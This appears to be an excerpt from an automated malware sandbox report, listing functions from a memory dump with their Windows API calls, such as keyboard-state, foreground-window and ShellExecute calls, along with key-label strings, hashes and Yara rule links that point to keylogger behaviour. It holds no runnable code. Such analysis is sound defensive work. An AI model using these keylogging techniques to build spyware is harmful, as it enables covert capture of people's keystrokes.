                                    Function 006D9B11, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 006D9B16
                                      • Part of subcall function 006D89BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 006D89EE
                                      • Part of subcall function 006D89BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 006D89F9
                                      • Part of subcall function 006D89BA: GetKeyboardLayout.USER32(00000000), ref: 006D8A00
                                      • Part of subcall function 006D89BA: GetKeyState.USER32(00000010), ref: 006D8A0A
                                      • Part of subcall function 006D89BA: GetKeyboardState.USER32(?), ref: 006D8A17
                                      • Part of subcall function 006D89BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 006D8A33
                                      • Part of subcall function 006D8B80: SetEvent.KERNEL32(?,?,?,?,006D9CFC,?,?,?,?,?,00000000), ref: 006D8BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 3195419117-2658077756
                                    • Opcode ID: 5e612c68560ea388a17c8b5a763dc278cd6026b34190f2ae7b47560f7b3e2344
                                    • Instruction ID: 9665284c14791db48a66500a60d7f50467778aef1901b89482d22e674bdcc624
                                    • Opcode Fuzzy Hash: 5e612c68560ea388a17c8b5a763dc278cd6026b34190f2ae7b47560f7b3e2344
                                    • Instruction Fuzzy Hash: 12E06561B006215A8898363DB93F5BE38238B42770741015FF5864B786DD5A494143DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E2777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 006E2795
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: 8Em$open
                                    • API String ID: 587946157-539362439
                                    • Opcode ID: d1447344646b0841918cb17ba90ff35ae5f5a78d3ea0a40ae12e3049fcc2303b
                                    • Instruction ID: 343136a96222cb5ad91903128237dd7ca26d00975485b446a18142f4e5a81e97
                                    • Opcode Fuzzy Hash: d1447344646b0841918cb17ba90ff35ae5f5a78d3ea0a40ae12e3049fcc2303b
                                    • Instruction Fuzzy Hash: 64E092716083406BD254FB71ECD5EBEB39AEB52300F00092FF54689292EFA45D088225
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9B6B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 006D9B70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 36c315bad28d80ae6e584dd9b89a25b41ddc16131164938a1d95077e83fc7d7c
                                    • Instruction ID: 7178448b652138b75f2d473dfc4939cb375278d0b4b5e6d47c02d6f8edb27322
                                    • Opcode Fuzzy Hash: 36c315bad28d80ae6e584dd9b89a25b41ddc16131164938a1d95077e83fc7d7c
                                    • Instruction Fuzzy Hash: 91E08661B203216AC924363DFA2AABA3D228B52770B41015BE4829B785CD8B491142E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E29DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: wave$CloseStop
                                    • String ID: 8Em
                                    • API String ID: 3638528417-1798622111
                                    • Opcode ID: 38304bdea6ea31a9722732177a4f4c519170ca6864c3d202196d563813c0feda
                                    • Instruction ID: 3c17623e957d2e65acc7b15748eaa5d2142cecd0bf5f4580a6a88346c9d8630a
                                    • Opcode Fuzzy Hash: 38304bdea6ea31a9722732177a4f4c519170ca6864c3d202196d563813c0feda
                                    • Instruction Fuzzy Hash: C0E086315082809BD354EB64EC4569DB792FB52301F40852EE195C92A3DF790549D759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070ABB8, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,006D1D39), ref: 0070AC4E
                                    • GetLastError.KERNEL32 ref: 0070AC5C
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070ACB7
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 0288f78049d4abc9b4875df12c478ce32a1148833f3107da6e8112864509cf30
                                    • Instruction ID: 78939079c7e89f540d8927463dc2712eacbaae4c32b4b35cc45efa1d1abf090c
                                    • Opcode Fuzzy Hash: 0288f78049d4abc9b4875df12c478ce32a1148833f3107da6e8112864509cf30
                                    • Instruction Fuzzy Hash: 9341C030600346FFDB21CF64C844AAE7BE5EF01311F254769E9599B2E5EB389D01DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DF4FE, Relevance: 5.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,006DF89B), ref: 006DF52C
                                    • IsBadReadPtr.KERNEL32(?,00000014,?,006DF89B), ref: 006DF5FE
                                    • SetLastError.KERNEL32(0000007F), ref: 006DF619
                                    • SetLastError.KERNEL32(0000007E,?,006DF89B), ref: 006DF632
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 50ffef09a12bdf50cbb9dacf426482a9b28459a673ec954ab57508b5e4faa245
                                    • Instruction ID: 6d45cfb86587d9ee8640db23b3902080e1232115129acc651ded6b6ee346a918
                                    • Opcode Fuzzy Hash: 50ffef09a12bdf50cbb9dacf426482a9b28459a673ec954ab57508b5e4faa245
                                    • Instruction Fuzzy Hash: D7416871A00205EFEB24CF59D884BAAB7F6FF98310F18846AE446D7750EB35E902DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%